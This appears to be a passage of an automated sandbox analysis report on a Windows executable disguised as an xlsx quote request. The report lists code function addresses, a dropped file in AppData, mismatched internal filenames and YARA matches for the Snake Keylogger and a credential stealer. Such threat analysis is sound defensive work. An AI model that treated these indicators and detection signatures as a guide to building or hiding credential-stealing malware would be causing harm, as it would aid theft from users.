Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0167E97A 9_2_0167E97A
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_016729EC 9_2_016729EC
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_01673AA1 9_2_01673AA1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_0167FA88 9_2_0167FA88
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_01673E09 9_2_01673E09
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B97D78 9_2_05B97D78
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B97720 9_2_05B97720
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B98B58 9_2_05B98B58
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9C598 9_2_05B9C598
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9E588 9_2_05B9E588
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9C588 9_2_05B9C588
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B915F8 9_2_05B915F8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B915E9 9_2_05B915E9
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B965C0 9_2_05B965C0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B90D38 9_2_05B90D38
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9E578 9_2_05B9E578
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B97D68 9_2_05B97D68
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B90D48 9_2_05B90D48
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B90498 9_2_05B90498
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B90488 9_2_05B90488
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9BC78 9_2_05B9BC78
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9DC68 9_2_05B9DC68
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B93460 9_2_05B93460
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9BC67 9_2_05B9BC67
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9FC58 9_2_05B9FC58
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9DC57 9_2_05B9DC57
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9FC48 9_2_05B9FC48
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9F7B9 9_2_05B9F7B9
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B95780 9_2_05B95780
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B92FF8 9_2_05B92FF8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9B7E8 9_2_05B9B7E8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9D7D8 9_2_05B9D7D8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9B7DA 9_2_05B9B7DA
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9D7C9 9_2_05B9D7C9
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9F7C8 9_2_05B9F7C8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9771F 9_2_05B9771F
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B97711 9_2_05B97711
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B92758 9_2_05B92758
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B92757 9_2_05B92757
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B92748 9_2_05B92748
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9CEB8 9_2_05B9CEB8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9AEB7 9_2_05B9AEB7
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B91EA8 9_2_05B91EA8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9EEA8 9_2_05B9EEA8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9CEA7 9_2_05B9CEA7
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B91E98 9_2_05B91E98
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9EE97 9_2_05B9EE97
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B94ED0 9_2_05B94ED0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9AEC8 9_2_05B9AEC8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B94EC3 9_2_05B94EC3
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B94620 9_2_05B94620
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B94610 9_2_05B94610
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B96E70 9_2_05B96E70
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B96E60 9_2_05B96E60
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B941B8 9_2_05B941B8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B911A0 9_2_05B911A0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B91190 9_2_05B91190
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B941C8 9_2_05B941C8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9C108 9_2_05B9C108
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9E0F8 9_2_05B9E0F8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9C0F8 9_2_05B9C0F8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B908F0 9_2_05B908F0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9E0E8 9_2_05B9E0E8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B908E1 9_2_05B908E1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9A0E0 9_2_05B9A0E0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9A0D0 9_2_05B9A0D0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B96030 9_2_05B96030
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B96020 9_2_05B96020
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B93008 9_2_05B93008
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B93007 9_2_05B93007
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B90006 9_2_05B90006
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B90040 9_2_05B90040
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B92BB0 9_2_05B92BB0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B92BA1 9_2_05B92BA1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B95BD8 9_2_05B95BD8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B95BC9 9_2_05B95BC9
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9F338 9_2_05B9F338
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9D337 9_2_05B9D337
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B95328 9_2_05B95328
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9F328 9_2_05B9F328
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B95318 9_2_05B95318
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B92300 9_2_05B92300
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9B358 9_2_05B9B358
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B98B49 9_2_05B98B49
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9D348 9_2_05B9D348
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9B348 9_2_05B9B348
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B972B8 9_2_05B972B8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B922F0 9_2_05B922F0
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B972C8 9_2_05B972C8
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9CA28 9_2_05B9CA28
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B96A18 9_2_05B96A18
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9EA18 9_2_05B9EA18
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B96A1A 9_2_05B96A1A
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9CA17 9_2_05B9CA17
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B9EA07 9_2_05B9EA07
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B94A78 9_2_05B94A78
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B94A68 9_2_05B94A68
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B91A50 9_2_05B91A50
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Code function: 9_2_05B91A40 9_2_05B91A40
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 10_2_02B9DE4C 10_2_02B9DE4C
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 10_2_052A1090 10_2_052A1090
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 10_2_052A7368 10_2_052A7368
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 10_2_052A0006 10_2_052A0006
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 10_2_052A0040 10_2_052A0040
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 10_2_052A7358 10_2_052A7358
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 10_2_07594140 10_2_07594140
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014F71A9 14_2_014F71A9
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014F5371 14_2_014F5371
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014FD271 14_2_014FD271
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014FD540 14_2_014FD540
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014FC460 14_2_014FC460
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014FA488 14_2_014FA488
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014FC730 14_2_014FC730
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014F7920 14_2_014F7920
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014FCA00 14_2_014FCA00
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014FEC08 14_2_014FEC08
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014FCCD0 14_2_014FCCD0
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014FBFC8 14_2_014FBFC8
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014FCFA1 14_2_014FCFA1
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014FF4C0 14_2_014FF4C0
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014FF4AF 14_2_014FF4AF
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014F29EC 14_2_014F29EC
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014FEBFA 14_2_014FEBFA
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014F3B95 14_2_014F3B95
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014F3AA1 14_2_014F3AA1
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_014F3E09 14_2_014F3E09
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BF1E80 14_2_06BF1E80
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BF47A8 14_2_06BF47A8
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BF1798 14_2_06BF1798
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BF9398 14_2_06BF9398
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BF10B8 14_2_06BF10B8
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BF8CC8 14_2_06BF8CC8
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BF0040 14_2_06BF0040
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BF8AA8 14_2_06BF8AA8
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFE288 14_2_06BFE288
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFE6E0 14_2_06BFE6E0
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFE6D1 14_2_06BFE6D1
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFDE30 14_2_06BFDE30
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFDE20 14_2_06BFDE20
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFE278 14_2_06BFE278
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BF1E72 14_2_06BF1E72
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BF4798 14_2_06BF4798
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFEF90 14_2_06BFEF90
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BF1788 14_2_06BF1788
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFEF82 14_2_06BFEF82
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFF3E8 14_2_06BFF3E8
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFEB38 14_2_06BFEB38
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFEB28 14_2_06BFEB28
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BF8320 14_2_06BF8320
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BF8310 14_2_06BF8310
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BF10A7 14_2_06BF10A7
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFFC98 14_2_06BFFC98
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFCCD0 14_2_06BFCCD0
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFCCC0 14_2_06BFCCC0
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFF830 14_2_06BFF830
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFC420 14_2_06BFC420
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFC40F 14_2_06BFC40F
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BF0007 14_2_06BF0007
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFC878 14_2_06BFC878
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFC869 14_2_06BFC869
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFF840 14_2_06BFF840
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFD580 14_2_06BFD580
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFD9D8 14_2_06BFD9D8
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFD9CA 14_2_06BFD9CA
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFD128 14_2_06BFD128
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFD119 14_2_06BFD119
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe Code function: 14_2_06BFD57F 14_2_06BFD57F
Sample file is different than original file name gathered from version info
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.00000000039C9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2101982159.0000000006F00000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092946249.0000000003C56000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2092066185.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2089156447.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4512742748.0000000001177000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4512203022.0000000000439000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Binary or memory string: OriginalFilenamesZXF.exeD vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
Uses 32bit PE files
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 9.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a595f8.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
